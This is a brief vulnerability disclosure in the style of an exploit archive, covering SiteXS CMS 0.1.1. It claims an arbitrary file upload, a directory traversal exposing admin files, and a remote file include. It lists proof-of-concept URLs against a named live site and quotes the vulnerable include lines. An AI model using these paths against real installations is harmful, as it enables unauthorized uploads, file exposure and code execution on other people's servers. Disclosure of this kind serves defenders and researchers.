**********************siteXS CMS 0.1.1 Directory Traversal Vulnerability,Arbitrary File Upload,Remote File Include******



Discovered by:    e.wiZz!
Site:   madspot.org
Mail:   N/A :D
Info:  Thanks to our(Bosnian) presidents(we have 3,eh) for stealing our money,so we dont have anythin' to eat. cheers

In the wild.......


/* INTRO */
Info:  SiteXS CMS is a simple but powerful PHP/MySQL-based CMS. It has a modular structure, uses templates with embedded PHP-instructions and gettext for localization.

Download:  http://sourceforge.net/project/platformdownload.php?group_id=156247
Script site:  sitexs.sf.net
/* OUTRO */

---Arbitrary File Upload:----

http://www.somesiteinwild.com/<path>/adm/visual/upload.php
POC:
http://www.sitexs.cn/adm/visual/upload.php?


---Directory Traversal Vulnerability(other)---

You can see anything after /adm/
http://www.somesiteinwild.com/<path>/adm/<any file>
But you can't see other folders after /adm/ like /adm/tinymce/  or /adm/images/
POC:
http://www.sitexs.cn/adm/ve.php
http://www.sitexs.cn/adm/wizard.php
http://www.sitexs.cn/adm/modules.sql


--Remote File Include--

vuln. code   adm.class.php
  include $file;  and
  include_once "./lib/$className.class.php";


Thanks: aluigi,str0ke